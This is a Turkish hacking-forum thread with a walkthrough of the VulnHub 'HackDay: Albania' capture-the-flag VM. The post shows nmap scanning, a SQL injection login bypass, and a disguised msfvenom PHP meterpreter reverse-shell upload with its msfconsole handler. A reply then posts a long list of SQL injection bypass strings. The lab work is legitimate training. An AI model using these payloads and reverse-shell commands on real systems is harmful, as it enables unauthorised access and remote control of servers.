Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm



Pentest Challange: Albian

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt 23-07-2017 21:24   #1
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Mantı V2
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 195


Thumbs up Pentest Challange: Albian




Arkadaşlar merhaba

Uzun bir zaman boyunca konu olarak CTF challange paylaşmadım.
Bugünde bunun anısına herhangi bir şey yapmıcam sadece Albania adındaki CTF challangeın çözümünü anlatacağım.


Dosyamızı şuradan rahatlıkla indirebilirsiniz.
https://download.vulnhub.com/hackday...ay-Albania.ova
Eğer indiremezseniz buradan asıl kısıma ulaşabilirsiniz.
https://www.vulnhub.com/entry/hackday-albania,167/

Önceden genel olarak 32 bit challangelar çözmekteydim.
Yeni bir bilgisayar alınca artık 64 bit challangelarda çözülebilir bir şekilde anlatıma devam edeceğim.


Ozaman başlayalım

İlk komutumuz bağlı olduğumuz ağın gatewayini öğrenmek için giriyoruz
route



Evet ip adresinin temelini 192.168.56.0 olarak alacağız.
Tüm subneti taramamız için 24 subnetini kullanacağız.
nmap -sP 192.168.56.0/24



Taramamızın sonucu olarak bize iki adet ip adresi çıkartmakta, biz 192.168.56.101 adresine saldıracağız.

Böyle bir karmaşanın olmasının nedeni önceden ağ yapısını köprü-bağdaştırıcısı ile kullanırken artık sadece-ana-makina ayarını kullanmamdan kaynaklı.
Böylece kendi gizliliğim daha ön planda olup, yapılan işlemler daha zararsız olabilmekte.

Hedef cihaza bir port taraması yapacağız, bunun için
nmap 192.168.56.101



Bize ssh(22) ve http(8008) portunun açık olduğunu söylüyor.
Tabiki http portuna bağlanmak için bir koşu tarayıcımı açıyorum.

Şunuda belirtmekte fayda var, normal bir şekilde ip adresini girerseniz default olarak 80 portunu varsayarak 80 portuna erişim isteyecektir. Bunun önüne geçmek için :8008 göstergesinide ekleyip doğru sonuca varacağız.



İlk olarak karşımıza hangi dilde olduğunu bilmediğim bir yazı ile karşılıyor ve hiç önemsemeden kapatıp bu ss'i çekiyorum.

Bir MR.Robot hayranı herhalde

İlk olarak dirb ile bir tarama yapıyorum ama yararımıza olacak bir veri çıkarmadığından devam ediyorum.
Sonra googlede gösterilmesi istenmeyen dizinlerin bulunduğu robot.txt dosyasına bakıyorum.




Anlaşılan bizi uğraştırmak istiyorlar, ve bende hamallık yapıp hepsini teker teker deniyorum.
Ve tek bir tanesi hariç hepsinde aynı sonucu alıyorum.



Burada vulnbank buradamı diye bir soru yöneltiyor.
(Gariptirki az önce garip bir dilde konuşan CTFimiz ingilizceyi sökmüş)
İlk olarak vulnbank urlsini ip adresini yanına yazdığımda sonuç alamazken, sadece son kısıma eklemenin yeterli olucağını anladım.
Ve güzel bir görüntü.



Karşımızda login paneli var, ve bir açık kaynayan bir sistemde olduğumdan ilk bypass deniyorum.(OR 1=1 -- -)
Başarılı bir şekilde bize istenilen sonucu veriyor.



Evet bunun gibi bir hata aldığınızda size bir meslek sırrı olan disable işlemini anlatmak istiyorum.
\ girerek mysql veritabanında kısadevre yapabilirsiniz.
Ve şifre kısmınada bypassımı yerleştiriyorum.



Girdiğimiz gibi karşımıza bir upload kısmı geliyor.
(Şimdi ilk halini göstermek isterdim ama ben bu CTFleri çözdükten sonra sizlere gösteriyorum ve elimde temiz bir çıktı olmadığından devam edebiliriz.)

Upload sistemine ilk olarak c99 shellini koymayı denedim
(Emin olun benimde bunu neden yaptığım hakkında bir fikrim yok).

Ama phpleri kabul etmesede açılmayacak şekilde anamenüye koyuyordu.
Ozamanda shellimizin uzantısını jpg ile değiştirelim.
Ve yine olmadı


Peki yükleyeceğimiz php dosyası illa bir shell olmak zorundamı, tabikide değil ozaman msfvenomdan php RAT oluşturuyorum.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 R > /home/belvando/at.jpg



RATımızı oluşturduktan sonra direk olarak yeniden upload ediyoruz.
Tabiki açmadan önce bir handler çalıştırmamız gerekmekte.
msfconsole -x "use multi/handler; set payload php/meterpreter/reverse_tcp; set lhost 192.168.56.1; exploit"

Hazırladığımız RATı upload ediyoruz.



Handlerımız çalışmakta iken bende karşı tarafa upload ettiğim RATımı açıyorum ve hemen bağlantı handlera düşüyor.



Evet bu seferkine kolay bir şekilde sızdık.

Eğer bunun gibi challangeların paylaşımını istiyorsanız teşekkür etmeyi unutmayın.
Elimde bir sürü challange var.
Eğer bir hatam olursa afola.
Birseferki konuda görüşmek dileğiyle.


HEPİNİZ USTA BİR HACKERSINIZ, TABİ ÖĞRENMEK İSTERSENİZ.



___________________________________________

Bastığın yerleri 'toprak' diyerek geçme, tanı!
Düşün altındaki binlerce kefensiz yatanı.
Sen şehit oğlusun, incitme, yazıktır atanı;
Verme, dünyaları alsan da bu cennet vatanı.
Telegram: @belvando
 Offline  
 
Alıntı ile Cevapla
Alt 23-07-2017 21:37   #2
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Hanuatu
Mesajlar
Konular

Teşekkür (Etti): 111
Teşekkür (Aldı): 113




Eline emeğine sağlık



___________________________________________

^^ Çakalların çığlık sesi , Kurt uluyana kadar duyulur. ^^

... S4LDIRI T1M ...

 Offline  
 
Alıntı ile Cevapla
Alt 23-07-2017 21:44   #3
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
09/2016
Mesajlar
Konular

Teşekkür (Etti): 607
Teşekkür (Aldı): 459




Elinize sağlık.



___________________________________________

"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
 Offline  
 
Alıntı ile Cevapla
Alt 23-07-2017 21:47   #4
  • Administrator
  • Üye Bilgileri
Üyelik tarihi
04/2013
Mesajlar
Konular

Teşekkür (Etti): 0
Teşekkür (Aldı): 3447




eline sağlık güzel çalışma olmuş

Konu Fearlessleon tarafından (27-07-2017 14:09 Saat 14:09 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

KurokoTetsuya Teşekkür etti.
Alt 23-07-2017 23:07   #5
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
06/2017
Mesajlar
Konular

Teşekkür (Etti): 55
Teşekkür (Aldı): 14




Eline emeğine sağlık
 Offline  
 
Alıntı ile Cevapla
Alt 23-07-2017 23:16   #6
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
04/2015
Nereden
SGA
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 2325
Teşekkür (Aldı): 1546




Böyle konuları okumak yerine BruteForce'u tercih ediyorsanız kendinize "Ben hack yolunda ilerliyorum" diyemezsiniz.

Elinize sağlık, dün mesaj atacaktım daha konularınızı göremiyorum diye.



___________________________________________

"Saian kurşun geçirmez Cadillac gibi"

 Offline  
 
Alıntı ile Cevapla
Alt 23-07-2017 23:37   #7
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
09/2013
Mesajlar
Konular

Teşekkür (Etti): 5
Teşekkür (Aldı): 30




Forumda neredeyse ilk defa, bruteforce yapıp ben hackerım diye geçinmeyen biriyle karşılaşıyoru. Bypass kodlarını konuya eklermisiniz?
 Offline  
 
Alıntı ile Cevapla
Alt 24-07-2017 01:21   #8
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Mantı V2
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 195




Alıntı:
KurokoTetsuya´isimli üyeden Alıntı Mesajı göster
Böyle konuları okumak yerine BruteForce'u tercih ediyorsanız kendinize "Ben hack yolunda ilerliyorum" diyemezsiniz.

Elinize sağlık, dün mesaj atacaktım daha konularınızı göremiyorum diye.
Evet bu aralar tatilde olduğumdan fazla ilgilenemiyorum.

Alıntı:
akrandd´isimli üyeden Alıntı Mesajı göster
Forumda neredeyse ilk defa, bruteforce yapıp ben hackerım diye geçinmeyen biriyle karşılaşıyoru. Bypass kodlarını konuya eklermisiniz?
Kod:
 ' or ''='
‘or’1’=’1
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
OR 1=1 -- -
' or true--
') or true--
') or ('')=('
') or 1--
') or ('x')=('
" or true--
" or ""="
" or 1--
" or "x"="
") or true--
") or ("")=("
") or 1--
") or ("x")=("
')) or true--
')) or ((''))=(('
')) or 1--
')) or (('x'))=(('
'-'
'+'
'&'
'^'
'*'
' or ''-'
' or ''+'
' or ''&'
' or ''^'
' or ''*'
"-"
"+"
"&"
"^"
"*"
" or ""-"
" or ""+"
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x



___________________________________________

Bastığın yerleri 'toprak' diyerek geçme, tanı!
Düşün altındaki binlerce kefensiz yatanı.
Sen şehit oğlusun, incitme, yazıktır atanı;
Verme, dünyaları alsan da bu cennet vatanı.
Telegram: @belvando
 Offline  
 
Alıntı ile Cevapla
Alt 24-07-2017 01:32   #9
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
12/2009
Nereden
Bilinmezden
Mesajlar
Konular

Teşekkür (Etti): 136
Teşekkür (Aldı): 147




Eline sağlık. Çok faydalı konu olmuş.



___________________________________________

01:10:11:01:01:10:00:01:01:10:00:11

2009-2018
 Offline  
 
Alıntı ile Cevapla
Alt 24-07-2017 03:02   #10
  • Kıdemli Orgeneral
  • Üye Bilgileri
Üyelik tarihi
12/2013
Mesajlar
Konular

Teşekkür (Etti): 3769
Teşekkür (Aldı): 2350




eline sağlık dostum



___________________________________________

Kolaylaştırınız, güçleştirmeyiniz, müjdeleyiniz, nefret ettirmeyiniz.
HZ.MUHAMMED MUSTAFA (S.A.V)

 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau